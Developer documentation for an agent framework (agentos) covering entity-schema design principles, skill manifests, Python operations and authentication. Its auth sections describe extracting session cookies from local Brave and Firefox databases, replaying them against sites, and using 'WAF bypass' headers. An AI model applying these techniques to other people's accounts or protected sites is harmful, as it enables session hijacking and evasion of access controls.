A comment is a post that replies_to another post. A reply to a message is still a message. Don’t create separate shapes for nested versions of the same thing — use the replies_to relation to express the hierarchy.

13. Booleans describe state, relations describe lineage

is_fork: boolean tells you nothing. forked_from: repository tells you the lineage. If a boolean implies a relationship to another entity, model the relationship instead.

Bad: is_fork: boolean (from what?) Good: forked_from: repository (the source is traversable)

14. Booleans that encode direction are really relationships

is_outgoing: boolean on a message means “I sent this.” But that information already lives in the from: account relation — if the from account is the user, it’s outgoing. Don’t duplicate relationship semantics as boolean flags.

Bad: is_outgoing: boolean on message Good: from: account relation — direction is derived by comparing from to the current user

Same pattern: is_sent, is_received, is_mine — all derivable from a directional relation.

15. Booleans that encode cardinality are derivable

is_group: boolean on a conversation means “has more than two participants.” That’s not state — it’s a count. Don’t store what you can derive from the structure.

Bad: is_group: boolean on conversation Good: participant: account[] relation — is_group is len(participants) > 2

Same pattern: has_attachments (derive from attachment: file[]), has_unread (derive from messages), is_empty (derive from children).

16. Source data doesn’t dictate shape

A skill’s source (API, database, scrape) returns whatever it returns. That doesn’t constrain the shape. The Python function is the transformation boundary — it takes raw source data and returns shape-native dicts.

Apple Contacts gives flat strings: Organization: Anthropic, Title: Engineer. That doesn’t mean person gets organization: string. It means the skill transforms those strings into a roles: role[] typed ref.

Bad: “The API returns platform: string, so the shape needs a platform field” Good: “What kind of thing is this? Model it correctly. The skill transforms source data to fit.”

Design shapes for the domain, not for the source. Every skill file is a template — other agents copy the patterns they see.

17. Model life like LinkedIn, not like a spreadsheet

People have roles at organizations. Roles have titles, departments, start dates, end dates. Education is a role at a school. Membership is a role in a community. Authorship is a role on a publication.

The LinkedIn mental model: a person has a timeline of positions, each connecting them to an organization with a title and time range. This is principle #2 made concrete.

person --roles--> role[] --organization--> organization
                         --title: "Engineer"
                         --department: "Research"
                         --start_date: 2024-01-15
                         --end_date: null (current)

This applies broadly: board membership, team membership, project assignment, course enrollment. If a relationship has a time dimension or a title, it’s a role.

Review Checklist

After writing or editing a shape, ask yourself:

Fields or relations? For each string field, ask: “Is this value itself an entity?” If yes, make it a relation.
Currency with price? Every monetary amount has a currency companion.
URLs audited? Is each URL the record’s own link, or does it point to another entity?
Domain-agnostic? Would this shape make sense for a different source providing the same kind of thing?
also justified? Does the also chain represent genuine “is-a” relationships that aid cross-type queries?
Author modeled correctly? Is the author a string (quick attribution) or a relation (traversable entity)?
Addresses structured? Are locations/addresses relations to place, not inline strings?
Collections owned? Do lists/playlists/shelves have a belongs_to relation?
Roles, not fields? Are time-bounded relationships (jobs, education, membership) modeled as role relations, not person fields?
Display makes sense? Are the right fields in title/subtitle/columns for this shape?
Content vs context? If this is a media artifact, are social metrics on a wrapper post instead?
Nesting via reply_to? Is a “sub-type” really just this shape with a parent relation?
ISO standards? Are languages (ISO 639-1), countries (ISO 3166-1), currencies (ISO 4217) using standard codes?
Booleans or relations? Does any boolean imply a relationship? (is_fork → forked_from)
Direction booleans? Is is_outgoing/is_sent derivable from a from relation?
Cardinality booleans? Is is_group/has_attachments derivable from counting a relation?
Source-independent? Did you design for the domain, or did the API shape leak into the schema?
Roles modeled as LinkedIn? Are jobs/education/memberships role[] relations with title + org + time range?

Returning shape-native data from operations

When an operation declares returns: email[], the Python function returns dicts whose keys match the shape. The shape is the contract — no separate mapping layer sits between the Python code and the engine.

# shapes/email.yaml
email:
  also: [message]
  fields:
    from_email: string
    to: string[]
    cc: string[]
    labels: string[]
    thread_id: string
  relations:
    from: account
    conversation: conversation
  display:
    title: name
    subtitle: from_email
    date: datePublished

# skill.yaml
operations:
  get_email:
    returns: email         # points to the email shape
    python:
      module: ./gmail.py
      function: get_email

# gmail.py — returns email-shaped dicts directly
def get_email(id: str, _call=None) -> dict:
    return {
        "id": msg_id,
        "name": subject,              # standard field
        "text": snippet,              # standard field
        "url": web_url,               # standard field
        "published": date,             # standard field
        "content": body_text,          # standard field (FTS)
        "from_email": sender,          # shape-specific field
        "to": recipients,             # shape-specific field
        "labels": label_ids,          # shape-specific field
    }

The Python code does the field mapping — it transforms raw API responses into shape-native dicts. Standard fields (id, name, text, url, image, author, published, content) are available on every shape without declaring them.

Canonical fields

The renderer resolves entity display from standard fields. Every Python return should populate as many of these as the source data supports — they drive consistent previews, detail views, and search results across all skills.

Field	Purpose
`name`	Primary label / title
`text`	Short summary or snippet for preview rows
`url`	Clickable link
`image`	Thumbnail / hero image
`author`	Creator / brand / owner
`published`	Temporal anchor
`content`	Long body text (stored separately, FTS-indexed)

Not every entity has all of these — a product may have no published, an order may have no image. Map what the source provides; skip what doesn’t apply.

Typed references (entity relationships)

To create linked entities and graph edges, return nested dicts keyed by entity type:

def get_email(id: str, _call=None) -> dict:
    return {
        "id": msg_id,
        "name": subject,
        # Single typed ref — creates: email --from--> account
        "from": {
            "account": {
                "handle": sender_email,
                "platform": "email",
                "display_name": sender_name,
            }
        },
        # Array typed ref — creates: email --to--> account (one per recipient)
        "to": {
            "account[]": [
                {"handle": addr, "platform": "email", "display_name": name}
                for addr, name in recipients
            ]
        },
    }

The outer key (from, to) becomes the edge label. The inner key (account, account[]) is the entity tag. The engine auto-creates/deduplicates the linked entity and adds the edge.

A typed ref is collapsed to null if none of its identity fields (id or name) survive — so partial data doesn’t create ghost entities.

Validation

Shape conformance is checked at two levels:

Pre-commit (static)

bin/audit-skills.py parses Python return dict literals via AST and warns if keys don’t match the declared shape. Runs automatically on every commit. Catches dict-literal returns but misses dynamic construction, helper functions, and _call composition.

Runtime

The engine validates every entity-returning skill call after execution. If the returned data contains keys not declared in the shape (fields, relations, or standard fields), a warning is logged to engine.log. Missing identity fields (id and name) also trigger warnings.

Runtime validation catches everything the static check misses — it sees the actual data. Check ~/.agentos/logs/engine.log for Shape conformance warnings after running a skill.

Both checks are advisory (warnings, not errors). They exist to surface non-conformant skills, not to block execution.

Prior Research

Extensive entity modeling research lives in /Users/joe/dev/entity-experiments/. These are not authoritative — many are outdated — but contain valuable principles and platform analysis worth consulting when designing new shapes.

Entity & Ontology Research

schema-entities.md — Core entity type definitions, OGP foundation, Joe’s hypotheses on note vs article
schema-relationships.md — Relationship type catalog and design patterns
research/entities/open-graph-protocol.md — OGP types, why flat beats hierarchical
research/entities/google-structured-data.md — Schema.org structured data patterns

Platform Research

research/platforms/google-takeout.md — 72 Google products analyzed for entity types (Contacts, Calendar, Drive, Gmail, Photos, YouTube, Maps, Chrome, Pay, Play)
research/platforms/facebook-graph.md — Facebook Graph API entity model
research/platforms/familysearch.md — GEDCOM X genealogical data model (two relationship types + qualifiers, computed derivations, source citations)

Relationship Research

research/relationships/genealogical-relationships.md — Family relationship modeling patterns
research/relationships/relationship-modeling.md — General relationship design
research/relationships/schema-org-relationships.md — Schema.org relationship types
research/relationships/ogp-relationships.md — OGP relationship patterns
research/relationships/no-orphans-constraint.md — Why every entity needs at least one connection

Systems Research

research/systems/outcome-entity.md — Outcome/goal entity modeling
research/context/pkm-community.md — Personal knowledge management patterns
research/context/semantic-file-systems.md — NEPOMUK and semantic desktop research

Skill Anatomy

The short version

The current skill style is:

Use connections: for external service dependencies (auth, base URLs)
Use returns: on operations to declare the shape (entity type) the operation produces
Python modules return dicts matching the shape schema directly — no mapping layer
Use simple snake_case tool names like search, read_webpage, or send_text
Use operations: for both entity-returning tools and local-control/action tools
Use inline returns: schemas for non-entity or action-style tools
Validate live behavior through the direct MCP path, not just by reading YAML

Folder shape

Every skill is a folder like:

skills/
  my-skill/
    skill.yaml           # required — executable manifest (connections, operations, …)
    readme.md            # recommended before ship — markdown instructions for agents (no YAML front matter)
    requirements.md      # recommended — scope out the API, auth model, and entities before writing YAML
    my_helper.py         # optional — Python helper when inline command logic gets complex

The runtime loads only skill.yaml for structure; readme.md is merged in as the instruction body (markdown only, no YAML front matter).

Start with requirements.md before writing skill YAML. Use it to scope out what endpoints or data surfaces exist, what auth model the service uses, which entities map to what, and any decisions or trade-offs. This is useful for any skill — not just reverse-engineered ones. For web skills without public APIs, it also becomes the place to log endpoint discoveries, header mysteries, and auth boundary mappings. See the Reverse Engineering section for that playbook.

Entity skill shape

Use this pattern for normal data-fetching or CRUD-ish skills.

id: my-skill
name: My Skill
description: One-line description
website: https://example.com

connections:
  api:
    base_url: "https://api.example.com"
    auth:
      type: api_key
      header:
        Authorization: '"Bearer " + .auth.key'
    label: API Key
    help_url: https://example.com/api-keys

operations:
  search:
    description: Search the service
    returns: result[]
    params:
      query: { type: string, required: true }
      limit: { type: integer, required: false }
    python:
      module: ./search.py
      function: search
      timeout: 30

The returns: result[] declaration points to a shape defined in shapes/result.yaml. The Python function returns a list of dicts whose keys match that shape’s fields:

def search(query: str, limit: int = 10, _call=None) -> list[dict]:
    # ... API logic ...
    return [
        {
            "id": item["url"],
            "name": item["title"],
            "text": item.get("summary"),
            "url": item["url"],
            "image": item.get("image"),
            "author": item.get("author"),
            "datePublished": item.get("published_at"),
        }
        for item in results
    ]

The Python code is where field mapping happens — it transforms raw API data into shape-native dicts. No separate mapping layer needed.

Local control shape

Use this pattern for command-backed skills such as terminal, browser, OS, or app control. Local skills have no connections: block — they don’t need external auth.

id: my-local-skill
name: My Local Skill
description: Control a local surface
website: https://example.com

operations:
  list_status:
    description: Inspect local state
    returns:
      ok: boolean
      cwd: string
    command:
      binary: python3
      args:
        - -c
        - |
          import json, os
          print(json.dumps({"ok": True, "cwd": os.getcwd()}))
      timeout: 10

If you are starting a new skill from scratch, use npm run new-skill -- my-skill for an entity scaffold or npm run new-skill -- my-skill --local-control for a local-control scaffold.

Operations

Operations are skill tools — the things agents can call.

Entity operations

When an operation returns data that maps to an entity type, declare the shape with returns::

operations:
  list_emails:
    description: List emails with full content
    returns: email[]        # array of email entities
    python:
      module: ./gmail.py
      function: list_emails
      timeout: 120

  get_email:
    description: Get a specific email
    returns: email           # single email entity
    python:
      module: ./gmail.py
      function: get_email
      timeout: 30

returns: email[] means “this operation returns an array of records matching the email shape.” The Python function must return dicts with keys matching the shape’s fields (see Shapes for field definitions and standard fields).

Rules:

Use snake_case — prefer short, obvious names like search, read_webpage, list_tasks
Use returns: entity[] for list/search results, returns: entity for single entities
The Python module does the field mapping — transform raw API data into shape-native dicts
Pass caller-provided limits through to the API when the backend supports them
Use relative rest.url paths (e.g. /tasks/filter) when the connection has a base_url
Use absolute URLs only when a skill has no connection or the endpoint is on a different domain

Action operations

Use an inline returns: schema when one of these is true:

The return value is not an entity
The tool is an action, not a normal entity read/write
The tool returns a custom inline schema

operations:
  send_email:
    description: Send a new email
    returns: email           # still an entity — the sent email
    python:
      module: ./gmail.py
      function: send_email
      timeout: 30

  delete_label:
    description: Delete a Gmail label
    returns:
      status: string         # inline schema — not an entity
    python:
      module: ./gmail.py
      function: delete_label
      timeout: 15

Rules:

Operation names should still be snake_case
Prefer direct, concrete verbs like send_text, focus_tab, list_status
Test them through mcp:call early, because runtime mismatches are easier to miss than YAML mismatches

Capabilities (dynamic MCP tools)

Skills can surface first-class MCP tools via provides:. Each provides: tool entry generates a top-level MCP tool (like web_search, web_read, flight_search) that agents see alongside the built-in tools. No hardcoded Rust is needed — the engine reads provides: from installed skills at startup.

Registration is skill-level. Add a provides: list entry with tool: (MCP tool name) and via: (operation name). Optional urls: declares URL patterns for routing (URL-specific providers are preferred over generic ones).

# Generic provider — always eligible
provides:
  - tool: web_search
    via: search

# URL-specific provider — preferred when URL matches
provides:
  - tool: web_read
    via: transcript_video
    urls:
      - "youtube.com/*"
      - "youtu.be/*"

When multiple skills provide the same tool name, the engine:

Intersects params across all providers (only common params appear on the MCP tool)
Routes calls by: explicit skill param > URL pattern match > credentialed provider > no-auth fallback
Adds a note in the tool description pointing to load() for provider-specific advanced options

Current dynamic tools (from installed skills):

web_search — brave, exa
web_read — firecrawl, exa, curl (generic); youtube, reddit (URL-specific)
flight_search — serpapi

To verify dynamic tools appear:

cd ~/dev/agentos
node scripts/mcp-test.mjs stdio "./target/release/agentos mcp"

Credential and cookie providers use the same provides: list with auth: entries (see Connections & Auth).

Connections & Auth

Every skill declares its external service dependencies as named connections:. Each connection can carry base_url, auth (with a type discriminator), optional description, label, help_url, optional, and local data sources:

sqlite: — path to a SQLite file (tilde-expanded). SQL operations bind to the connection that declares the database; there is no top-level database: on the skill.
vars: — non-secret config (paths, filenames) merged into the executor context (e.g. params.connection.vars for Python) so scripts can read local files without hardcoding home-directory paths.

Local skills (no external services) simply omit the connections: block.

Common patterns

Most common — single API key connection:

connections:
  api:
    base_url: "https://api.example.com/v1"
    auth:
      type: api_key
      header:
        x-api-key: .auth.key
    label: API Key
    help_url: https://example.com/api-keys

Multi-connection — public GraphQL + authenticated web session:

connections:
  graphql:
    base_url: "https://api.example.com/graphql"
  web:
    auth:
      type: cookies
      domain: ".example.com"

Multi-backend — same service, different transports (e.g. SDK + CLI):

connections:
  sdk:
    description: "Python SDK — typed models, batch ops, biometric auth"
    vars:
      account_name: "my-account"
  cli:
    description: "CLI tool — stable JSON contract, fallback path"
    vars:
      binary_path: "/opt/homebrew/bin/mytool"

When connections differ by transport rather than service, each operation declares which it supports (connection: [sdk, cli]). The Python helper receives connection as a param and dispatches to the appropriate backend. Both paths normalize output into the same adapter-compatible shape. Use this when: (a) a v0 SDK needs a stable CLI fallback, (b) read ops work with both but writes need the SDK for batch/typed APIs, or (c) offline/online modes with the same data model.

Rules

base_url on a connection is used to resolve relative rest.url and graphql.endpoint values
Single-connection skills auto-infer the connection — no connection: needed on each operation
Multi-connection skills must declare connection: on each operation: either one name (connection: api) or a list (connection: [api, cache]) when the caller may choose the backing source (live API vs local cache, etc.)
With connection: [a, b, …], the first entry is the default; expose connection in params and pass it through from Python/rest/graphql so the runtime resolves the effective connection (see skills/granola/skill.yaml for params.connection wired into args)
Set connection: none on operations that should skip auth entirely
Use optional: true if the skill works anonymously but improves with credentials
Connections without any auth fields (just base_url, sqlite, vars, and/or description) are valid — they serve as service declarations

Connection names are arbitrary. Common conventions:

api — REST API with key/token auth
graphql — GraphQL/AppSync (may or may not have auth)
web — cookie-authenticated website (user session)

Auth types

All auth is declared under a single auth: key with a type discriminator. Three types are supported.

api_key — API keys/tokens injected via header, query, or body templates with jaq expressions:

connections:
  api:
    auth:
      type: api_key
      header:
        Authorization: '"Bearer " + .auth.key'
    label: API Key

cookies — session cookies resolved from the credential store (for stored sessions) or provider skills (Brave, Firefox, Playwright):

connections:
  web:
    auth:
      type: cookies
      domain: ".claude.ai"
      names: ["sessionKey"]

oauth — OAuth 2.0 token refresh and provider-based acquisition:

connections:
  gmail:
    auth:
      type: oauth
      service: google
      scopes:
        - https://mail.google.com/

Resolution algorithm

Cookie auth uses timestamp-based resolution — all sources are checked, and the one with the newest cookies wins. There is no fixed priority order and no TTL-based expiry.

Sources

Three sources of cookies exist, each with different freshness characteristics:

Source	What it is	Freshness
In-memory cache	Cookies from the last extraction, updated by `Set-Cookie` responses from our own HTTP requests (writeback). Lives in engine process memory.	Can be newer than the browser — when a server rotates a session token via `Set-Cookie` in response to our request, the cache has the new value before the browser does.
Browser providers (Brave, Firefox)	Fresh extraction from the browser’s local cookie database.	Reflects the user’s latest browsing — if they just visited Amazon and got a fresh session, the browser has the newest cookies.
Credential store (`credentials.sqlite`)	Persistent copy of cookies, also updated by writeback. Survives engine restart.	Same data as the cache, but persistent. Staler than the cache if writeback updated the cache since last store write.

How it works

1. Gather candidates from ALL sources:
   a. In-memory cache           (instant — HashMap lookup)
   b. Browser providers          (~20ms — local SQLite reads)
   c. Credential store           (~1ms — local SQLite read)

2. Score each candidate:
   - Filter expired cookies
   - Build cookie header string
   - Compute newest_cookie_at (latest per-cookie timestamp)

3. Pick the candidate with the highest newest_cookie_at.
   On ties, the first candidate (cache) wins.

4. If winner is from cache → return immediately (identity already known)
   If winner is from a provider → run account_check for identity, persist to store + cache
   If winner is from store → return as-is (fallback)

5. If no candidates → error with help_url
6. On SESSION_EXPIRED or 401/403 → exclude failed provider, retry

Every cookie carries a timestamp tracking when it was last set:

Browser cookies have a created field (Unix seconds with sub-second precision) from the browser’s cookie database. Brave and Firefox both provide this.
Writeback cookies (from Set-Cookie responses to our HTTP requests) get stamped with now() when the engine processes the response. This is how our cache becomes newer than the browser after a server-side token rotation.
Store cookies carry a cookie_timestamps map in the value blob, updated on writeback via merge_cookie_header.

The newest_cookie_at for a candidate is the maximum timestamp across all its cookies. This single number determines who wins.

Example: why timestamps matter

Call 1 (cold start — no cache):
  Cache:    empty
  Brave:    session_token created at 1712019700.5    ← winner (only candidate)
  Store:    empty
  → Extracts from Brave, runs account_check, persists to store + cache

Call 2 (cache populated):
  Cache:    session_token at 1712019700.5
  Brave:    session_token at 1712019700.5             (same — user hasn't browsed)
  Store:    session_token at 1712019700.5
  → Tie — cache wins (first candidate). No account_check needed. ~58ms.

Call 3 (server rotated token via Set-Cookie):
  Cache:    session_token at 1712019800.0              ← winner (writeback stamped now())
  Brave:    session_token at 1712019700.5
  Store:    session_token at 1712019800.0
  → Cache wins. The server gave US the new token; the browser doesn't have it yet.

Call 4 (user browsed Amazon, got fresh cookies):
  Cache:    session_token at 1712019800.0
  Brave:    session_token at 1712019900.3              ← winner (user's browsing is newest)
  Store:    session_token at 1712019800.0
  → Brave wins. Fresh extraction, account_check runs, cache + store updated.

Why no TTL?

Previous versions used a 5-minute TTL on the cache — entries older than 5 minutes were treated as stale. This was arbitrary and wrong in both directions: too aggressive when writeback kept the cache genuinely fresh, too lenient when the browser got new cookies 30 seconds later.

Timestamps replace TTL entirely. A cache entry from 10 minutes ago still wins if its cookies are genuinely newer than what the browser has. A cache entry from 1 second ago loses if the browser has fresher cookies. The timestamp is the only arbiter.

Playwright

Playwright (live browser session via CDP) is always skipped unless explicitly requested via the provider parameter. It launches a visible Chrome window — too expensive and disruptive for automatic resolution. Use it for reverse engineering and login flows, not for runtime auth.

When a Python function receives .auth.cookies (via args: { cookies: .auth.cookies } in skill.yaml), the value is a cookie header string — e.g. "name1=val1; name2=val2". This is the same format as the HTTP Cookie header.

Pass it directly to agentos.http:

from agentos import http

# Simple request
resp = http.get(url, cookies=cookie_header, **http.headers(accept="json"))

# Session with cookie jar
with http.client(cookies=cookie_header) as c:
    resp = c.get(url, **http.headers(waf="cf", accept="html"))

The SDK helpers get_cookies(params) and require_cookies(params, op) extract the cookie header from params.auth.cookies:

from agentos.http import require_cookies

cookie_header = require_cookies(params, "list_orders")
# Raises ValueError if no cookies available

Individual cookie values are also available as .auth.{cookie_name} — e.g. .auth.sessionKey — for operations that need specific cookies by name rather than the full header string.

The engine automatically filters cookies by RFC 6265 domain matching when resolving auth. If a connection declares base_url: "https://riders.uber.com", only cookies whose domain matches riders.uber.com (including parent domains like .uber.com) are included. Sibling subdomain cookies (.auth.uber.com, .www.uber.com) are filtered out. Skills don’t need to handle this — the provider does it automatically.

Cookie-auth skills should resolve account identity so the graph knows who the session belongs to. Two deterministic paths exist:

JSON APIs — use check.identifier and check.display on the auth block. The check block handles liveness and identity in one HTTP call using jaq expressions on the JSON response:

connections:
  web:
    auth:
      type: cookies
      domain: ".claude.ai"
      names: ["sessionKey"]
      check:
        url: "https://claude.ai/api/organizations"
        expect_status: 200
        identifier: '.[] | select(.capabilities | contains(["chat"])) | .email'
        display: '.[] | select(.capabilities | contains(["chat"])) | .name'

HTML services — use a Python operation with an account adapter. When the introspection endpoint returns HTML (not JSON), identity extraction belongs in Python. The skill declares an account adapter and a check_session operation that returns: account:

adapters:
  account:
    id: .customer_id
    name: .display
    issuer: .issuer
    data.marketplace_id: .marketplace_id

operations:
  check_session:
    returns: account
    connection: web
    python:
      module: ./my_skill.py
      function: whoami
      params: true
      timeout: 30

The Python function parses the HTML and returns structured identity data including issuer (the service domain, e.g. "amazon.com"), customer_id (a stable account ID used as the adapter id), and display (a human-friendly name). The extraction pipeline automatically links account-tagged nodes to the primary user via Person --claims--> Account.

Include issuer in the account adapter — it’s the join key that links the graph entity to credential store rows. The adapter id field doubles as the account identifier for dedup.

Leading by example: skills/amazon/ (HTML identity via Python), skills/claude/ (JSON identity via check block).

Provider auth

Credentials can come from other installed apps (e.g. Mimestream provides Google OAuth tokens, Brave provides browser cookies).

Skill-level provides: is a typed list: each entry is either tool (capability routing) or auth (auth supply).

OAuth provider (excerpt):

provides:
  - auth: oauth
    service: google
    via: credential_get
    scopes:
      - https://mail.google.com/

Cookie provider (excerpt):

provides:
  - auth: cookies
    via: cookie_get
    description: "Cookies from Brave Browser profiles"

Consumer skills don’t name a specific provider — the runtime discovers installed providers automatically via find_auth_providers(type, scope).

Three cookie providers are available: Brave (reads SQLite cookie DB), Firefox (reads SQLite cookie DB), and Playwright (reads from persistent Chromium session via CDP). Playwright is the primary provider for cookies acquired through login automation flows.

Example references:

OAuth consumer: skills/gmail/skill.yaml
OAuth provider: skills/mimestream/skill.yaml
Cookie consumer: skills/claude/skill.yaml
Cookie provider (browser DB): skills/brave-browser/skill.yaml
Cookie provider (automation): skills/playwright/skill.yaml
Multi-connection: skills/goodreads/skill.yaml (graphql + web)

Auth failure convention for Python skills

When a Python skill detects an authentication failure, it should raise an exception rather than returning an error dict. Two conventions exist, and the engine handles both:

Use SESSION_EXPIRED: when the skill can definitively detect that the session is stale — typically via login redirects, expired-session pages, or specific error responses. This is the recommended convention for cookie-authenticated skills.

def list_orders(params):
    cookie_header = _require_cookies(params, "list_orders")
    with _auth_client(cookie_header) as client:
        resp = client.get(f"{BASE}/your-orders/orders")
        body = resp.text

    if _is_login_redirect(resp, body):
        raise RuntimeError(
            "SESSION_EXPIRED: Amazon redirected to login — session cookies are expired or invalid."
        )
    return _parse_orders(body)

Format: SESSION_EXPIRED: <human-readable reason>

The engine catches this prefix, excludes the current cookie provider from the candidate list, and retries with the next-best provider. This handles the common case where one browser has stale cookies but another (e.g. Playwright with a live session) has fresh ones.

Convention 2: HTTP status codes in exception message (fallback)

For API-style endpoints that return standard HTTP status codes, include 401, 403, unauthorized, or forbidden in the exception message:

def get_api_keys(cookies: str) -> dict:
    resp = client.get("/api/keys")
    if resp.status_code in (401, 403):
        raise Exception(f"Unauthorized (HTTP {resp.status_code}): session expired")

Both conventions trigger the same retry behavior: invalidate the cookie cache, exclude the failing provider, and re-run with fresh cookies.

When to use which

Situation	Convention
HTML scraping — login redirect detected	`SESSION_EXPIRED:` prefix
HTML scraping — auth wall / sign-in page	`SESSION_EXPIRED:` prefix
JSON API returns 401/403	HTTP status in exception
Dashboard returns error JSON with “expired”	Either — `SESSION_EXPIRED:` is clearer

Provider retry behavior

The engine retries once on auth failure, with the failing provider excluded:

1. Engine selects best provider (e.g. Brave, 23 cookies)
2. Skill runs, raises SESSION_EXPIRED
3. Engine excludes Brave, re-selects (e.g. Playwright, 16 cookies)
4. Skill runs again with Playwright's cookies
5. If this also fails → error surfaces to the caller (no infinite loops)

When multiple browser cookie providers are installed (Brave, Firefox), they all run as candidates alongside the cache and store. The winner is determined by newest_cookie_at — the latest per-cookie timestamp across all cookies.

Within the provider tier (when comparing two browser providers against each other), the scoring heuristic breaks ties:

Required cookie names — providers that have all cookies listed in the connection’s names field score highest
Creation timestamp — the provider whose cookies were created most recently wins
Cookie count — final tiebreaker when all else is equal

Playwright is always skipped unless explicitly requested (see above).

Explicit provider override

When the automatic selection picks wrong (or for testing), pass provider as a top-level argument to run():

run({ skill: "amazon", tool: "list_orders", provider: "playwright" })

This bypasses the selection heuristic entirely and uses the specified provider. Valid provider names are the skill IDs of installed cookie providers (e.g. "playwright", "brave-browser", "firefox").

Python Skills

Use the python: executor when a skill needs Python logic (parsing, API glue, multi-step flows). It calls a function directly in a Python module — no binary: python3 boilerplate, no sys.argv dispatch, no | tostring on every arg.

Basic shape

operations:
  get_schedule:
    description: Get today's class schedule
    returns: class[]
    params:
      date: { type: string, required: false }
      location_id: { type: integer, default: 6 }
    python:
      module: ./my_script.py
      function: get_schedule
      args:
        date: .params.date
        location_id: .params.location_id
      timeout: 30

The Python function receives keyword arguments and returns shape-native data — dicts whose keys match the declared shape:

def get_schedule(date: str = None, location_id: int = 6) -> list[dict]:
    # ... fetch from API ...
    return [
        {
            "id": cls["id"],
            "name": cls["title"],
            "datePublished": cls["start_time"],
            "text": cls["description"],
            # shape-specific fields
            "instructor": cls.get("coach_name"),
            "capacity": cls.get("max_capacity"),
        }
        for cls in raw_classes
    ]

The function does the field mapping — it transforms raw API/service data into dicts matching the shape declared in returns:. No separate mapping layer is needed.

Rules:

module is resolved relative to the skill folder (use ./my_script.py)
function is the function name in the module
args values are jaq expressions resolved against the params context (same as rest.body)
Shorthand: When the Python function expects a single params dict, use params: true instead of args: { params: .params }
Args are passed as typed JSON — integers stay integers, no | tostring needed
timeout defaults to 30 seconds
response mapping (root, transform) works the same as rest: and graphql:
Auth values are available via .auth.* in args expressions
The runtime handles I/O — just return a value from your function

Examples: gmail, claude, goodreads, granola, cursor, here-now.

Returning shape-native data

When an operation declares returns: email[], the Python function must return a list of dicts matching the email shape. Use standard fields (id, name, text, url, image, author, datePublished, content) plus any shape-specific fields.

# gmail.py — returns email-shaped dicts directly
def get_email(id: str, url: str = None, _call=None) -> dict:
    # ... Gmail API logic ...
    return {
        "id": msg_id,
        "name": subject,                    # standard: primary label
        "text": snippet,                     # standard: preview text
        "url": f"https://mail.google.com/...",
        "datePublished": internal_date,      # standard: temporal anchor
        "content": body_text,                # standard: long body (FTS)
        # email-specific fields from shape
        "from_email": sender,
        "to": recipients,
        "labels": label_ids,
    }

For typed references (relations to other entities), return nested dicts keyed by entity type:

def get_email(id: str, _call=None) -> dict:
    return {
        "id": msg_id,
        "name": subject,
        # typed reference — creates a linked account entity
        "from": {
            "account": {
                "handle": sender_email,
                "platform": "email",
                "display_name": sender_name,
            }
        },
    }

Connection dispatch

When a skill has multiple connections that serve the same operations via different transports (SDK vs CLI, live API vs cache), the Python helper receives the active connection and dispatches accordingly:

operations:
  list_items:
    description: List items from the service
    returns: item[]
    connection: [sdk, cli]
    python:
      module: ./my_skill.py
      function: list_items
      args:
        vault: .params.vault
        connection: '.connection'
      timeout: 60

def list_items(vault, connection=None):
    if connection and connection.get("id") == "sdk":
        return _list_via_sdk(vault, connection["vars"])
    else:
        return _list_via_cli(vault, connection.get("vars", {}))

Both code paths return the same shape-native dicts. This pattern is useful when a primary path (SDK with batch ops) needs a stable fallback (CLI with subprocess calls). See skills/granola/ for the api + cache variant of this pattern.

`_call` dispatch

When a Python operation needs to compose multiple API calls (e.g. list returns stubs, get returns full data), use _call to invoke sibling operations. The engine injects _call automatically when the function signature accepts it.

def list_emails(query="", limit=20, _call=None):
    stubs = _call("list_email_stubs", {"query": query, "limit": limit})
    return [_call("get_email", {"id": s["id"]}) for s in stubs]

The YAML wires the Python function as usual:

operations:
  list_emails:
    description: List emails with full content
    returns: email[]
    python:
      module: ./gmail.py
      function: list_emails
      args:
        query: '.params.query // ""'
        limit: '.params.limit // 20'
      timeout: 120

  list_email_stubs:
    description: "Internal: list email IDs only"
    returns: email[]
    rest:
      url: "/messages"
      method: GET
      query:
        maxResults: ".params.limit // 20"
        q: ".params.query"
      response:
        transform: ".messages // []"

Rules:

_call can only call operations in the same skill — no cross-skill calls
The engine executes each dispatched call with full credential injection (OAuth, cookies, API keys)
Python never sees raw credentials — the engine is the only process that touches tokens
_call is synchronous and blocking — each call completes before the next starts
The same account context from the parent call is used for dispatched operations
If a function’s signature does not include _call (or **kwargs), it is not injected — existing functions work unchanged

Leading by example: skills/gmail/gmail.py (list + hydrate pattern with _call).

Auth Flows

When a skill needs credentials from a web dashboard (API keys, session tokens), the flow is: discover with Playwright, implement with agentos.http. For steps that agentos.http can’t replay (native form POSTs, complex redirect chains), the agent uses Playwright for that step and agentos.http for everything after.

The pattern

Discover — use the Playwright skill interactively to walk through the login/signup flow. capture_network reveals endpoints, cookies shows what session cookies get set, inspect shows form structure.
Implement — write the login flow as Python + agentos.http in the skill’s .py file. Use http.headers() for WAF bypass and inject cookies from params.auth.cookies or _call to other skills (e.g. Gmail for magic links, brave-browser for Google session cookies).
Store — return extracted credentials via __secrets__ so the engine stores them securely. The LLM never sees raw secret values.
Test — test-skills.cjs should work without a running browser. If your skill needs Playwright at runtime, rethink the approach.

Dashboard connections

Skills with web dashboards declare a dashboard connection alongside their api connection:

connections:
  api:
    base_url: "https://api.example.com"
    auth:
      type: api_key
      header: { x-api-key: .auth.key }

  dashboard:
    base_url: "https://dashboard.example.com"
    auth:
      type: cookies
      domain: ".example.com"
      login:
        - sso: google
        - email_link: true

All auth goes under a single auth: key with a type discriminator (api_key, cookies, oauth). The login block declares available login methods. Login operations are Python functions that execute the flow with agentos.http. See specs/auth-model.md in the engine repo for the unified auth model, and specs/sso-credential-bootstrap.md for the end-to-end bootstrap flow.

Secret-safe credential return

def get_api_key(*, _call=None, **params):
    # ... HTTPX calls to get the key ...
    return {
        "__secrets__": [{
            "issuer": "api.example.com",
            "identifier": "user@example.com",
            "item_type": "api_key",
            "label": "Example API Key",
            "source": "example",
            "value": {"key": api_key},
            "metadata": {"masked": {"key": "••••" + api_key[-4:]}}
        }],
        "__result__": {"status": "authenticated", "identifier": "user@example.com"}
    }

The engine writes __secrets__ to the credential store, creates an account entity on the graph, and strips the secrets before the MCP response reaches the agent.

The engine uses timestamp-based resolution — all cookie sources are checked, and the one with the newest cookies wins. There’s no fixed priority order. See connections.md → Resolution Algorithm for the full explanation with worked examples.

Sources (all checked on every resolve):

In-memory cache — cookies from the last extraction, updated by Set-Cookie responses from our own HTTP requests (writeback). Can be newer than the browser when a server rotates tokens.
Browser providers (Brave, Firefox) — fresh extraction from the browser’s local cookie database (~20ms). Reflects the user’s latest browsing.
Credential store (credentials.sqlite) — persistent copy, also updated by writeback. Survives engine restart.

